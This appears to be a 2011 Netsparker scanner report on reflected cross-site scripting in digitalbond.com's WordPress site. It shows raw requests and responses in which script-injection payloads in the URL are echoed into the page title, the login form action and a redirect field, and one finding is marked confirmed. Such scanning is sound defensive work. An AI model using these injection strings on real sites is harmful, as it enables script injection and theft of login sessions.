User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: www.digitalbond.com
Cookie: PHPSESSID=c08c5868e098031ab723f6ece5332be2; wordpress_test_cookie=WP+Cookie+check
Accept-Encoding: gzip, deflate
Referer: https://www.digitalbond.com/wp-includes/js/l10n.js?ver=20101110
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: www.digitalbond.com
Cookie: PHPSESSID=c08c5868e098031ab723f6ece5332be2; wordpress_test_cookie=WP+Cookie+check
Accept-Encoding: gzip, deflate
Response
HTTP/1.1 404 Not Found
Server: nginx/0.7.65
Date: Tue, 19 Apr 2011 20:05:35 GMT
Content-Type: text/html; charset=UTF-8
Connection: keep-alive
Keep-Alive: timeout=10
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Set-Cookie: wordpress_test_cookie=WP+Cookie+check; path=/
X-Pingback: http://www.digitalbond.com/xmlrpc.php
X-Powered-By: W3 Total Cache/0.9.1.3
Last-Modified: Tue, 19 Apr 2011 20:05:34 GMT
Vary: User-Agent,Accept-Encoding
Content-Encoding:
Content-Length: 11370
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" dir="ltr" lang="en-US">
<head>
<meta http-equiv="Content-Type" content="text/html; charset=UTF-8" />
<meta http-equiv="X-UA-Compatible" content="IE=EmulateIE7" />
<title>Login or nothing found for Wp-includes Js '"-->< Style>< Script><script>netsparker(0x000439)< Script></title>
<link rel="shortcut icon" href="https://digibond.wpengine.netdna-cdn.com/wp-content/themes/atahualpa/images/favicon/fff-link.ico" />
<link rel="profile" href="http://gmpg.org/xfn/11" />
<link rel="pingback" href="https://www.digitalbond.com/xmlrpc.php" />
<link rel="stylesheet" href="https://www.digitalbond.com/?bfa_ata_file=css" type="text/css" media="all" /><link rel="alternate" type="application/rss+xml" title="Digital Bond's SCADA Security Portal » Feed" href="https://www.digitalbond.com/feed/" /><link rel="alternate" type="application/rss+xml" title="Digital Bond's SCADA Security Portal » Comments Feed" href="https://www.digitalbond.com/comments/feed/" /><link rel="stylesheet" href="https://www.digitalbond.com/wp-content/plugins/oiopub-direct/images/style/output.css" type="text/css" /><link rel='stylesheet' id='grunion.css-css' href='https://www.digitalbond.com/wp-content/plugins/grunion-contact-form/css/grunion.css?ver=3.1.1' type='text/css' media='all' /><link rel='stylesheet' id='amr-ical-events-list-css' href='http://digibond.wpengine.netdna-cdn.com/wp-content/plugins/amr-ical-events-list/css/icallist.css?ver=1' type='text/css' media='all' /><link rel='stylesheet' id='amr-ical-events-list_print-css' href='https://www.digitalbond.com/wp-content/plugins/amr-ical-events-list/css/icalprint.css?ver=1' type='text/css' media='print' /><link rel='stylesheet' id='wp_sidebarlogin_css_styles-css' href='https://www.digitalbond.com/wp-content/plugins/sidebar-login/style.css?ver=3.1.1' type='text/css' media='all' /><script type='text/javascript' src='https://digibond.wpengine.netdna-cdn.com/wp-includes/js/l10n.js?ver=20101110'></script><script type='text/javascript' src="https://ajax.googleapis.com/ajax/libs/jquery/1.4.4/jquery.min.js"></script><script type='text/javascript' src='https://digibond.wpengine.netdna-cdn.com/wp-content/themes/atahualpa/js/DD_roundies.js?ver=0.0.2a'></script><link rel="EditURI" type="application/rsd+xml" title="RSD" href="https://www.digitalbond.com/xmlrpc.php?rsd" /><link rel="wlwmanifest" type="application/wlwmanifest+xml" href="https://www.digitalbond.com/wp-includes/wlwmanifest.xml" /> <link rel='index' title='Digital Bond's SCADA Security Portal' href='https://www.digitalbond.com/' /><!-- All in One SEO Pack - Pro Version 1.72 by Michael Torbert of Semper Fi Web Design[334,405] --><!-- /all in one seo pack Pro Version--><script type="text/javascript">var _sf_startpt=(new Date()).getTime()</script><script type="text/javascript" src="https://www.digitalbond.com/wp-content/plugins/powerpress/player.js"></script><script type="text/javascript"><!--
function powerpress_pinw(pinw){window.open('https://www.digitalbond.com/?powerpress_pinw='+pinw, 'PowerPressPlayer','toolbar=0,status=0,resizable=1,width=460,height=320'); return false;}
powerpress_url = 'http://www.digitalbond.com/wp-content/plugins/powerpress/';
//-->
</script>
<script type="text/javascript" src="https://www.digitalbond.com/?bfa_ata_file=js"></script>
<!--[if IE 6]>
<script type="text/javascript">DD_roundies.addRule("a.posts-icon, a.comments-icon, a.email-icon, img.logo");</script>
<![endif]-->
</head>
<body class="error404">
<div id="wrapper">
<div id="container">
<table id="layout" border="0" cellspacing="0" cellpadding="0">
<colgroup>
<col class="coltwo" />
<col class="colthree" /></colgroup>
<tr>
<!-- Header -->
<td id="header" colspan="2">
<div id="menu1"><ul id="rmenu2" class="clearfix rMenu-hor rMenu"><li class="page_item"><a href="https://www.digitalbond.com/" title="Digital Bond's SCADA Security Portal"><span>Blog</span></a></li><li class="page_item page-item-15"><a href="http://www.digitalbond.com/scada-security-consulting/" ><span>Consulting</span></a></li><li class="page_item page-item-5499"><a href="http://www.digitalbond.com/critical-intelligence/" ><span>Critical Intelligence</span></a></li><li class="page_item page-item-17"><a href="http://www.digitalbond.com/scadapedia/" ><span>SCADApedia</span></a></li><li class="page_item page-item-5501"><a href="http://www.digitalbond.com/tools/" ><span>Tools</span></a></li><li class="page_item page-item-18"><a href="http://www.digitalbond.com/about-us/" ><span>About Us</span></a></li><li class="page_item page-item-8807"><a href="http://www.digitalbond.com/advertise/" ><span>Advertise</span></a></li></ul></div> <div class="horbar1"> </div> <table id="logoarea" cellpadding="0" cellspacing="0" border="0" width="100%"><tr><td valign="middle" class="logoarea-logo"><a href="https://www.digitalbond.com/"><img class="logo" src="https://digibond.wpengine.netdna-cdn.com/wp-content/themes/atahualpa/images/digitalbond_logo_web.png" alt="Digital Bond's SCADA Security Portal" /></a></td><td valign="middle" class="logoarea-title"><div id="oio-banner-1" style="width:728px; float:right;"><a rel="nofollow" target="_blank" href="http://www.digitalbond.com/wp-content/plugins/oiopub-direct/modules/tracker/go.php?id=1" title=""><img src="http://digibond.wpengine.netdna-cdn.com/wp-content/plugins/oiopub-direct/uploads/zGN33S_Waterfall Banner - horizontal 2010.gif" alt="" style="width:728px; height:90px; border:0px;" /></a></div><hr class="oio-clear-right" /></td></tr></table> <div class="horbar1"> </div> <div id="menu2" class="menu-whats-hot-container"><ul id="rmenu" class="clearfix rMenu-hor rMenu"><li id="menu-item-8657" class="menu-item menu-item-type-custom menu-item-object-custom menu-item-8657"><a><span>What’s Hot:</span></a></li><li id="menu-item-8653" class="menu-item menu-item-type-post_type menu-item-object-page menu-item-8653"><a href="http://www.digitalbond.com/tools/bandolier/"><span>Bandolier</span></a></li><li id="menu-item-8654" class="menu-item menu-item-type-post_type menu-item-object-page menu-item-8654"><a href="http://www.digitalbond.com/tools/portaledge/"><span>Portaledge</span></a></li><li id="menu-item-8655" class="menu-item menu-item-type-post_type menu-item-object-page menu-item-8655"><a href="http://www.digitalbond.com/tools/quickdraw/"><span>Quickdraw SCADA IDS</span></a></li><li id="menu-item-9624" class="menu-item menu-item-type-taxonomy menu-item-object-category menu-item-9624"><a href="https://www.digitalbond.com/category/vulnerabilities/vulnerability-disclosure-vulnerabilities/"><span>Vulnerability Disclosure</span></a></li></ul></div>
</td>
<!-- / Header -->
</tr>
<!-- Main Body -->
<tr id="bodyrow">
<!-- Main Column -->
<td id="middle">
<h2>Subscriber Content or Not Found</h2>
<p>Sorry, but the content you want is subscriber only. Lucky for you, subscribing to digitalbond.com is free. <b>Go to the right sidebar and either login or register.</b></p>
<p>If you are already logged in, then the requested link is broken or unavailable.</p>
</td>
<!-- / Main Column -->
<!-- Right Inner Sidebar -->
<!-- Right Sidebar -->
<td id="right">
<div id="search-3" class="widget widget_search"><form method="get" class="searchform" action="https://www.digitalbond.com/">
<table class="searchform" cellpadding="0" cellspacing="0" border="0">
<tr>
<td class="searchfield">
<input type="text" class="text inputblur" value="" name="s" />
</td>
<td class="searchbutton">
<input name="submit" value="Search" type="image" src="https://digibond.wpengine.netdna-cdn.com/wp-content/themes/atahualpa/images/magnifier2-gray.gif" style="display: block; border:none; padding: 0 0 0 5px; margin: 0;" />
</td>
</tr></table>
</form></div><div id="text-6" class="widget widget_text"><div class="widget-title"><h3> </h3></div> <div class="textwidget"><p><b>Subscribe</b>: <a href="http://feeds.feedburner.com/digitalbond/oLPM"><img src="http://digibond.wpengine.netdna-cdn.com/wp-content/uploads/2011/02/subscribe_rss4.png" alt="" title="subscribe_rss4" width="16" height="16" /></a> <a href="http://feedburner.google.com/fb/a/mailverify?uri=digitalbond&loc=en_US"><img src="http://digibond.wpengine.netdna-cdn.com/wp-content/uploads/2011/02/subscribe_email4.png" alt="" title="subscribe_rss4" width="16" height="16" /></a> <a href="http://twitter.com/digitalbond"><img src="http://digibond.wpengine.netdna-cdn.com/wp-content/uploads/2011/02/subscribe_twitter4.png" alt="" title="subscribe_rss4" width="16" height="16" /></a></p></div> </div><div id="text-7" class="widget widget_text"> <div class="textwidget"><p><b>Got a hot tip? See something interesting in SCADA Security?</b> <a href="mailto:info@digitalbond.com">Tell Us</a></p></div> </div><div id="wp_sidebarlogin-3" class="widget widget_wp_sidebarlogin"><div class="widget-title"><h3><span>Login</span></h3></div><form method="post" action="https://www.digitalbond.com/wp-includes/js/\'\"--></style></script><script>netsparker(0x000439)</script>/?_login=ed509d58cb"> <p><label for="user_login">Username:</label><br/><input name="log" value="" class="mid" id="user_login" type="text" /></p>
<p><label for="user_pass">Password:</label><br/><input name="pwd" class="mid" id="user_pass" type="password" /></p>
<input type="hidden" name="redirect_to" value="https://www.digitalbond.com/wp-includes/js/\'\"--></style></script><script>netsparker(0x000439)</script>/?_login=dd6ab2da1b" />
<p class="rememberme"><input name="rememberme" class="checkbox" id="rememberme" value="forever" type="checkbox" /> <label for="rememberme">Remember me</label></p>
<p class="submit"><input type="submit" name="wp-submit" id="wp-submit" value="Login »" />
<input type="hidden" name="sidebarlogin_posted" value="1" />
<input type="hidden" name="testcookie" value="1" /></p>
</form>
<ul class="sidebarlogin_otherlinks"> <li><a href="https://www.digitalbond.com/wp-login.php?action=register" rel="nofollow">Register</a></li>
<li><a href="https://www.digitalbond.com/wp-login.php?action=lostpassword" title="" rel="nofollow">Lost your password?</a></li>
</ul></div><div id="text-8" class="widget widget_text"> <div class="textwidget"><p><br><a href="http://digibond.wpengine.netdna-cdn.com/wp-content/uploads/2011/02/r_and_d.jpg"><img class="alignleft size-full wp-image-8638" title="r_and_d" src="http://digibond.wpengine.netdna-cdn.com/wp-content/uploads/2011/02/r_and_d.jpg" alt="" width="57" height="56" /></a></p><p>Just Released:</p><p><a title="New SCADA IDS Vulnerability Signatures" href="http://www.digitalbond.com/2011/03/28/luigi-vuln-scada-ids-sigs-released/">New SCADA IDS Vulnerability Signatures</a></p><p><br><a href="http://digibond.wpengine.netdna-cdn.com/wp-content/uploads/2011/02/r_and_d.jpg"><img class="alignleft size-full wp-image-8638" title="r_and_d" src="http://digibond.wpengine.netdna-cdn.com/wp-content/uploads/2011/02/r_and_d.jpg" alt="" width="57" height="56" /></a></p><p><a title="Portaledge CIP-5 Monitoring Modules" href="http://www.digitalbond.com/tools/portaledge/nerc-cip-5-monitoring-modules/">Portaledge CIP-5 Cisco and Juniper Firewall Monitoring Modules</a><br></p><p><br><a href="http://digibond.wpengine.netdna-cdn.com/wp-content/uploads/2011/02/podcast.jpg"><img class="alignleft size-full wp-image-8638" title="r_and_d" src="http://digibond.wpengine.netdna-cdn.com/wp-content/uploads/2011/02/podcast.jpg" alt="" width="57" height="56" /></a></p><p><a title="March Podcast" href="http://s3.amazonaws.com/TMICSS/TMICSS_Mar_2011.mp3">March TMICSS Podcast: SCADA IDS for Luigi Vulns, Security DoD Smart Grid Projects</a><br</p><p><br><a href="http://digibond.wpengine.netdna-cdn.com/wp-content/uploads/2011/02/r_and_d.jpg"><img class="alignleft size-full wp-image-8638" title="r_and_d" src="http://digibond.wpengine.netdna-cdn.com/wp-content/uploads/2011/02/r_and_d.jpg" alt="" width="57" height="56" /></a></p><p>Subscribe for Bandolier, Quickdraw, Portaledge & 3rd Party Tool Updates</p><p><a title="ICS Security Tool Mailing List" href="http://www.digitalbond.com/tools/ics-security-tool-mail-list/">ICS Security Tool Mailing List</a><br><br></p><p><a href="http://digitalbond.com/critical-intelligence/"><img src="http://digibond.wpengine.netdna-cdn.com/wp-content/uploads/2011/02/Critintel_logo_250.jpg" alt="" title="Critintel_logo_250" width="250" height="143" class="aligncenter size-full wp-image-8808" /></a></p></div> </div><div id="kb-advanced-rss-3" class="widget widget_kbrss"><div class="widget-title"><h3><a class="kbrsswidget" href="http://feeds.critical-intelligence.com/?type=worth" title="Syndicate this content"><img width="14" height="14" src="http://digibond.wpengine.netdna-cdn.com/wp-includes/images/rss.png" alt="RSS" style="background:orange;color:white;" /></a> Worth Reading</h3></div><ul><li><a class='kbrsswidget' href='http://granitekey.blogspot.com/2011/04/executive-level-apathy-for.html' title='I have been thinking about this notion of "Executive Level Apathy" for a while now, and I have come to the conclusion that executives are doing exactly what anyone would do if put in their positions and under the circumstances. Hear me out for a moment before throwing daggers. '>Executive Level Apathy For Security...Maybe Not So Much </a></br> I have been thinking about this notion of "Executive Level Apathy" for a while now, and I have come to the conclusion that executives are doing exactly what anyone would do if put in their positions and under the ci</li></br><li><a class='kbrsswidget' href='http://community.controlglobal.com/content/nerc-cyber-attack-task-force-addressing-appropriate-issues' title='The scenario being addressed is an organized disruption that disables or impairs ..
Server: nginx/0.7.65
Date: Tue, 19 Apr 2011 20:05:35 GMT
Content-Type: text/html; charset=UTF-8
Connection: keep-alive
Keep-Alive: timeout=10
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Set-Cookie: wordpress_test_cookie=WP+Cookie+check; path=/
X-Pingback: http://www.digitalbond.com/xmlrpc.php
X-Powered-By: W3 Total Cache/0.9.1.3
Last-Modified: Tue, 19 Apr 2011 20:05:34 GMT
Vary: User-Agent,Accept-Encoding
Content-Encoding:
Content-Length: 11370
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" dir="ltr" lang="en-US">
<head>
<meta http-equiv="Content-Type" content="text/html; charset=UTF-8" />
<meta http-equiv="X-UA-Compatible" content="IE=EmulateIE7" />
<title>Login or nothing found for Wp-includes Js '"-->< Style>< Script><script>netsparker(0x000439)< Script></title>
<link rel="shortcut icon" href="https://digibond.wpengine.netdna-cdn.com/wp-content/themes/atahualpa/images/favicon/fff-link.ico" />
<link rel="profile" href="http://gmpg.org/xfn/11" />
<link rel="pingback" href="https://www.digitalbond.com/xmlrpc.php" />
<link rel="stylesheet" href="https://www.digitalbond.com/?bfa_ata_file=css" type="text/css" media="all" /><link rel="alternate" type="application/rss+xml" title="Digital Bond's SCADA Security Portal » Feed" href="https://www.digitalbond.com/feed/" /><link rel="alternate" type="application/rss+xml" title="Digital Bond's SCADA Security Portal » Comments Feed" href="https://www.digitalbond.com/comments/feed/" /><link rel="stylesheet" href="https://www.digitalbond.com/wp-content/plugins/oiopub-direct/images/style/output.css" type="text/css" /><link rel='stylesheet' id='grunion.css-css' href='https://www.digitalbond.com/wp-content/plugins/grunion-contact-form/css/grunion.css?ver=3.1.1' type='text/css' media='all' /><link rel='stylesheet' id='amr-ical-events-list-css' href='http://digibond.wpengine.netdna-cdn.com/wp-content/plugins/amr-ical-events-list/css/icallist.css?ver=1' type='text/css' media='all' /><link rel='stylesheet' id='amr-ical-events-list_print-css' href='https://www.digitalbond.com/wp-content/plugins/amr-ical-events-list/css/icalprint.css?ver=1' type='text/css' media='print' /><link rel='stylesheet' id='wp_sidebarlogin_css_styles-css' href='https://www.digitalbond.com/wp-content/plugins/sidebar-login/style.css?ver=3.1.1' type='text/css' media='all' /><script type='text/javascript' src='https://digibond.wpengine.netdna-cdn.com/wp-includes/js/l10n.js?ver=20101110'></script><script type='text/javascript' src="https://ajax.googleapis.com/ajax/libs/jquery/1.4.4/jquery.min.js"></script><script type='text/javascript' src='https://digibond.wpengine.netdna-cdn.com/wp-content/themes/atahualpa/js/DD_roundies.js?ver=0.0.2a'></script><link rel="EditURI" type="application/rsd+xml" title="RSD" href="https://www.digitalbond.com/xmlrpc.php?rsd" /><link rel="wlwmanifest" type="application/wlwmanifest+xml" href="https://www.digitalbond.com/wp-includes/wlwmanifest.xml" /> <link rel='index' title='Digital Bond's SCADA Security Portal' href='https://www.digitalbond.com/' /><!-- All in One SEO Pack - Pro Version 1.72 by Michael Torbert of Semper Fi Web Design[334,405] --><!-- /all in one seo pack Pro Version--><script type="text/javascript">var _sf_startpt=(new Date()).getTime()</script><script type="text/javascript" src="https://www.digitalbond.com/wp-content/plugins/powerpress/player.js"></script><script type="text/javascript"><!--
function powerpress_pinw(pinw){window.open('https://www.digitalbond.com/?powerpress_pinw='+pinw, 'PowerPressPlayer','toolbar=0,status=0,resizable=1,width=460,height=320'); return false;}
powerpress_url = 'http://www.digitalbond.com/wp-content/plugins/powerpress/';
//-->
</script>
<script type="text/javascript" src="https://www.digitalbond.com/?bfa_ata_file=js"></script>
<!--[if IE 6]>
<script type="text/javascript">DD_roundies.addRule("a.posts-icon, a.comments-icon, a.email-icon, img.logo");</script>
<![endif]-->
</head>
<body class="error404">
<div id="wrapper">
<div id="container">
<table id="layout" border="0" cellspacing="0" cellpadding="0">
<colgroup>
<col class="coltwo" />
<col class="colthree" /></colgroup>
<tr>
<!-- Header -->
<td id="header" colspan="2">
<div id="menu1"><ul id="rmenu2" class="clearfix rMenu-hor rMenu"><li class="page_item"><a href="https://www.digitalbond.com/" title="Digital Bond's SCADA Security Portal"><span>Blog</span></a></li><li class="page_item page-item-15"><a href="http://www.digitalbond.com/scada-security-consulting/" ><span>Consulting</span></a></li><li class="page_item page-item-5499"><a href="http://www.digitalbond.com/critical-intelligence/" ><span>Critical Intelligence</span></a></li><li class="page_item page-item-17"><a href="http://www.digitalbond.com/scadapedia/" ><span>SCADApedia</span></a></li><li class="page_item page-item-5501"><a href="http://www.digitalbond.com/tools/" ><span>Tools</span></a></li><li class="page_item page-item-18"><a href="http://www.digitalbond.com/about-us/" ><span>About Us</span></a></li><li class="page_item page-item-8807"><a href="http://www.digitalbond.com/advertise/" ><span>Advertise</span></a></li></ul></div> <div class="horbar1"> </div> <table id="logoarea" cellpadding="0" cellspacing="0" border="0" width="100%"><tr><td valign="middle" class="logoarea-logo"><a href="https://www.digitalbond.com/"><img class="logo" src="https://digibond.wpengine.netdna-cdn.com/wp-content/themes/atahualpa/images/digitalbond_logo_web.png" alt="Digital Bond's SCADA Security Portal" /></a></td><td valign="middle" class="logoarea-title"><div id="oio-banner-1" style="width:728px; float:right;"><a rel="nofollow" target="_blank" href="http://www.digitalbond.com/wp-content/plugins/oiopub-direct/modules/tracker/go.php?id=1" title=""><img src="http://digibond.wpengine.netdna-cdn.com/wp-content/plugins/oiopub-direct/uploads/zGN33S_Waterfall Banner - horizontal 2010.gif" alt="" style="width:728px; height:90px; border:0px;" /></a></div><hr class="oio-clear-right" /></td></tr></table> <div class="horbar1"> </div> <div id="menu2" class="menu-whats-hot-container"><ul id="rmenu" class="clearfix rMenu-hor rMenu"><li id="menu-item-8657" class="menu-item menu-item-type-custom menu-item-object-custom menu-item-8657"><a><span>What’s Hot:</span></a></li><li id="menu-item-8653" class="menu-item menu-item-type-post_type menu-item-object-page menu-item-8653"><a href="http://www.digitalbond.com/tools/bandolier/"><span>Bandolier</span></a></li><li id="menu-item-8654" class="menu-item menu-item-type-post_type menu-item-object-page menu-item-8654"><a href="http://www.digitalbond.com/tools/portaledge/"><span>Portaledge</span></a></li><li id="menu-item-8655" class="menu-item menu-item-type-post_type menu-item-object-page menu-item-8655"><a href="http://www.digitalbond.com/tools/quickdraw/"><span>Quickdraw SCADA IDS</span></a></li><li id="menu-item-9624" class="menu-item menu-item-type-taxonomy menu-item-object-category menu-item-9624"><a href="https://www.digitalbond.com/category/vulnerabilities/vulnerability-disclosure-vulnerabilities/"><span>Vulnerability Disclosure</span></a></li></ul></div>
</td>
<!-- / Header -->
</tr>
<!-- Main Body -->
<tr id="bodyrow">
<!-- Main Column -->
<td id="middle">
<h2>Subscriber Content or Not Found</h2>
<p>Sorry, but the content you want is subscriber only. Lucky for you, subscribing to digitalbond.com is free. <b>Go to the right sidebar and either login or register.</b></p>
<p>If you are already logged in, then the requested link is broken or unavailable.</p>
</td>
<!-- / Main Column -->
<!-- Right Inner Sidebar -->
<!-- Right Sidebar -->
<td id="right">
<div id="search-3" class="widget widget_search"><form method="get" class="searchform" action="https://www.digitalbond.com/">
<table class="searchform" cellpadding="0" cellspacing="0" border="0">
<tr>
<td class="searchfield">
<input type="text" class="text inputblur" value="" name="s" />
</td>
<td class="searchbutton">
<input name="submit" value="Search" type="image" src="https://digibond.wpengine.netdna-cdn.com/wp-content/themes/atahualpa/images/magnifier2-gray.gif" style="display: block; border:none; padding: 0 0 0 5px; margin: 0;" />
</td>
</tr></table>
</form></div><div id="text-6" class="widget widget_text"><div class="widget-title"><h3> </h3></div> <div class="textwidget"><p><b>Subscribe</b>: <a href="http://feeds.feedburner.com/digitalbond/oLPM"><img src="http://digibond.wpengine.netdna-cdn.com/wp-content/uploads/2011/02/subscribe_rss4.png" alt="" title="subscribe_rss4" width="16" height="16" /></a> <a href="http://feedburner.google.com/fb/a/mailverify?uri=digitalbond&loc=en_US"><img src="http://digibond.wpengine.netdna-cdn.com/wp-content/uploads/2011/02/subscribe_email4.png" alt="" title="subscribe_rss4" width="16" height="16" /></a> <a href="http://twitter.com/digitalbond"><img src="http://digibond.wpengine.netdna-cdn.com/wp-content/uploads/2011/02/subscribe_twitter4.png" alt="" title="subscribe_rss4" width="16" height="16" /></a></p></div> </div><div id="text-7" class="widget widget_text"> <div class="textwidget"><p><b>Got a hot tip? See something interesting in SCADA Security?</b> <a href="mailto:info@digitalbond.com">Tell Us</a></p></div> </div><div id="wp_sidebarlogin-3" class="widget widget_wp_sidebarlogin"><div class="widget-title"><h3><span>Login</span></h3></div><form method="post" action="https://www.digitalbond.com/wp-includes/js/\'\"--></style></script><script>netsparker(0x000439)</script>/?_login=ed509d58cb"> <p><label for="user_login">Username:</label><br/><input name="log" value="" class="mid" id="user_login" type="text" /></p>
<p><label for="user_pass">Password:</label><br/><input name="pwd" class="mid" id="user_pass" type="password" /></p>
<input type="hidden" name="redirect_to" value="https://www.digitalbond.com/wp-includes/js/\'\"--></style></script><script>netsparker(0x000439)</script>/?_login=dd6ab2da1b" />
<p class="rememberme"><input name="rememberme" class="checkbox" id="rememberme" value="forever" type="checkbox" /> <label for="rememberme">Remember me</label></p>
<p class="submit"><input type="submit" name="wp-submit" id="wp-submit" value="Login »" />
<input type="hidden" name="sidebarlogin_posted" value="1" />
<input type="hidden" name="testcookie" value="1" /></p>
</form>
<ul class="sidebarlogin_otherlinks"> <li><a href="https://www.digitalbond.com/wp-login.php?action=register" rel="nofollow">Register</a></li>
<li><a href="https://www.digitalbond.com/wp-login.php?action=lostpassword" title="" rel="nofollow">Lost your password?</a></li>
</ul></div><div id="text-8" class="widget widget_text"> <div class="textwidget"><p><br><a href="http://digibond.wpengine.netdna-cdn.com/wp-content/uploads/2011/02/r_and_d.jpg"><img class="alignleft size-full wp-image-8638" title="r_and_d" src="http://digibond.wpengine.netdna-cdn.com/wp-content/uploads/2011/02/r_and_d.jpg" alt="" width="57" height="56" /></a></p><p>Just Released:</p><p><a title="New SCADA IDS Vulnerability Signatures" href="http://www.digitalbond.com/2011/03/28/luigi-vuln-scada-ids-sigs-released/">New SCADA IDS Vulnerability Signatures</a></p><p><br><a href="http://digibond.wpengine.netdna-cdn.com/wp-content/uploads/2011/02/r_and_d.jpg"><img class="alignleft size-full wp-image-8638" title="r_and_d" src="http://digibond.wpengine.netdna-cdn.com/wp-content/uploads/2011/02/r_and_d.jpg" alt="" width="57" height="56" /></a></p><p><a title="Portaledge CIP-5 Monitoring Modules" href="http://www.digitalbond.com/tools/portaledge/nerc-cip-5-monitoring-modules/">Portaledge CIP-5 Cisco and Juniper Firewall Monitoring Modules</a><br></p><p><br><a href="http://digibond.wpengine.netdna-cdn.com/wp-content/uploads/2011/02/podcast.jpg"><img class="alignleft size-full wp-image-8638" title="r_and_d" src="http://digibond.wpengine.netdna-cdn.com/wp-content/uploads/2011/02/podcast.jpg" alt="" width="57" height="56" /></a></p><p><a title="March Podcast" href="http://s3.amazonaws.com/TMICSS/TMICSS_Mar_2011.mp3">March TMICSS Podcast: SCADA IDS for Luigi Vulns, Security DoD Smart Grid Projects</a><br</p><p><br><a href="http://digibond.wpengine.netdna-cdn.com/wp-content/uploads/2011/02/r_and_d.jpg"><img class="alignleft size-full wp-image-8638" title="r_and_d" src="http://digibond.wpengine.netdna-cdn.com/wp-content/uploads/2011/02/r_and_d.jpg" alt="" width="57" height="56" /></a></p><p>Subscribe for Bandolier, Quickdraw, Portaledge & 3rd Party Tool Updates</p><p><a title="ICS Security Tool Mailing List" href="http://www.digitalbond.com/tools/ics-security-tool-mail-list/">ICS Security Tool Mailing List</a><br><br></p><p><a href="http://digitalbond.com/critical-intelligence/"><img src="http://digibond.wpengine.netdna-cdn.com/wp-content/uploads/2011/02/Critintel_logo_250.jpg" alt="" title="Critintel_logo_250" width="250" height="143" class="aligncenter size-full wp-image-8808" /></a></p></div> </div><div id="kb-advanced-rss-3" class="widget widget_kbrss"><div class="widget-title"><h3><a class="kbrsswidget" href="http://feeds.critical-intelligence.com/?type=worth" title="Syndicate this content"><img width="14" height="14" src="http://digibond.wpengine.netdna-cdn.com/wp-includes/images/rss.png" alt="RSS" style="background:orange;color:white;" /></a> Worth Reading</h3></div><ul><li><a class='kbrsswidget' href='http://granitekey.blogspot.com/2011/04/executive-level-apathy-for.html' title='I have been thinking about this notion of "Executive Level Apathy" for a while now, and I have come to the conclusion that executives are doing exactly what anyone would do if put in their positions and under the circumstances. Hear me out for a moment before throwing daggers. '>Executive Level Apathy For Security...Maybe Not So Much </a></br> I have been thinking about this notion of "Executive Level Apathy" for a while now, and I have come to the conclusion that executives are doing exactly what anyone would do if put in their positions and under the ci</li></br><li><a class='kbrsswidget' href='http://community.controlglobal.com/content/nerc-cyber-attack-task-force-addressing-appropriate-issues' title='The scenario being addressed is an organized disruption that disables or impairs ..
|
- /wp-admin/css/login.css'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Ealert(0x000406)%3C/script%3E
/wp-admin/css/login.css'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Ealert(0x000406)%3C/script%3E CONFIRMED |
Parameters
| Parameter | Type | Value |
| ver | GET | 20110121 |
| URI-BASED | Raw URI | '"--></style></script><script>alert(0x000406)</script> |
Request
GET /wp-admin/css/login.css'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Enetsparker(0x000406)%3C/script%3E HTTP/1.1
Referer: https://www.digitalbond.com/wp-login.php?action=register
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: www.digitalbond.com
Cookie: PHPSESSID=5c8a40ddb91f1a2acfe18880a9fdfdca; wordpress_test_cookie=WP+Cookie+check
Accept-Encoding: gzip, deflate
Referer: https://www.digitalbond.com/wp-login.php?action=register
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: www.digitalbond.com
Cookie: PHPSESSID=5c8a40ddb91f1a2acfe18880a9fdfdca; wordpress_test_cookie=WP+Cookie+check
Accept-Encoding: gzip, deflate
Response
HTTP/1.1 404 Not Found
Server: nginx/0.7.65
Date: Tue, 19 Apr 2011 20:05:36 GMT
Content-Type: text/html; charset=UTF-8
Connection: keep-alive
Keep-Alive: timeout=10
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Set-Cookie: wordpress_test_cookie=WP+Cookie+check; path=/
X-Pingback: http://www.digitalbond.com/xmlrpc.php
X-Powered-By: W3 Total Cache/0.9.1.3
Last-Modified: Tue, 19 Apr 2011 20:05:35 GMT
Vary: User-Agent,Accept-Encoding
Content-Encoding:
Content-Length: 11394
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" dir="ltr" lang="en-US">
<head>
<meta http-equiv="Content-Type" content="text/html; charset=UTF-8" />
<meta http-equiv="X-UA-Compatible" content="IE=EmulateIE7" />
<title>Login or nothing found for Wp-admin Css Login Css'"-->< Style>< Script><script>netsparker(0x000406)< Script></title>
<link rel="shortcut icon" href="https://digibond.wpengine.netdna-cdn.com/wp-content/themes/atahualpa/images/favicon/fff-link.ico" />
<link rel="profile" href="http://gmpg.org/xfn/11" />
<link rel="pingback" href="https://www.digitalbond.com/xmlrpc.php" />
